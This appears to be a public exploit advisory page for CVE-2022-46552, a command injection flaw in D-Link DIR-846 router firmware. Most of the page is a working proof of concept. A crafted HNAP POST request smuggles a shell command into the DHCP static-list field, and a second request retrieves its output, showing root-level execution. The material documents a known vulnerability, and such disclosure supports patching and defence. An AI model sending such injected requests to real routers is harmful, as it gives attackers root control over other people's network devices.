D-Link DIR-846 Remote Command Execution

2023.04.05
Credit: Francoa Taffarel
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2022-46552
CWE: CWE-78

# Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability # Google Dork: NA # Date: 30/01/2023 # Exploit Author: Françoa Taffarel # Vendor Homepage: https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip # Software Link: https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip # Version: DIR846enFW100A53DBR-Retail # Tested on: D-LINK DIR-846 # CVE : CVE-2022-46552 D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request. ### Malicious POST Request ``` POST /HNAP1/ HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings" HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285 Content-Length: 171 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775 Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4 {"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}} ``` ### Response ``` HTTP/1.1 200 OK X-Powered-By: PHP/7.1.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-type: text/html; charset=UTF-8 Connection: close Date: Thu, 01 Dec 2022 11:03:54 GMT Server: lighttpd/1.4.35 Content-Length: 68 {"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}} ``` ### Data from RCE Request ``` GET /HNAP1/rce_confirmed HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1 Upgrade-Insecure-Requests: 1 ``` ### Response ``` HTTP/1.1 200 OK Content-Type: application/octet-stream Accept-Ranges: bytes Content-Length: 24 Connection: close Date: Thu, 01 Dec 2022 23:24:28 GMT Server: lighttpd/1.4.35 uid=0(root) gid=0(root) ```


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top